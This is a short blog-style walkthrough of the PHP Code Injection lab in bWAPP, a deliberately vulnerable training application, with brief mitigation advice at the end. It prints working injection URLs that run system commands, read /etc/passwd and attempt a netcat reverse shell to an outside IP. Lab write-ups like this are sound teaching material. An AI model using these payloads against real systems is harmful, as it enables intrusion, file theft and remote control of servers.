In this walk through, we will be going through the PHP Code Injection vulnerability section from bWAPP Labs. We will be exploring and exploiting PHP Code Injection on a test page and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
Security: Low
- Setting the security level to Low.
- The application issues a get request when clicked on the message and displays the message. By default the message is set to “test”
- I used the below payload to check if the application is vulnerable to PHP injection attack and i got the output.
localhost/phpi.php?message=Hello;system("whoami"); localhost/phpi.php?message=Hello;phpinfo()
localhost/phpi.php?message=Hello;system("cat /etc/passwd")
- I tried to get a reverse shell using the below payload however was unable to due to some reason.
localhost/phpi.php?message=test;system("nc 192.168.29.81 4444 -e /bin/bash");
Security: Medium & High
- Application is not vulnerable in Medium and High level as the code is now using htmlspecialchars function instead of the vulnerable eval function.
Also Read: bWAPP – OS Command Injection
Conclusion:
So, we finally completed all the security levels for the bWAPP PHP Code Injection Vulnerability. We looked into the various ways how application has been set up in various levels and how we can bypass the security controls implemented. PHP Code Injection attacks can be mitigated by avoiding dangerous functions like exec()
, shell_exec()
, system()
and passthru()
. Along with that, we should perform code serialization and use PHP security linter. On that note, i will take your leave and will meet you in next one with another bWAPP vulnerability writeup, till then “Keep Hacking”.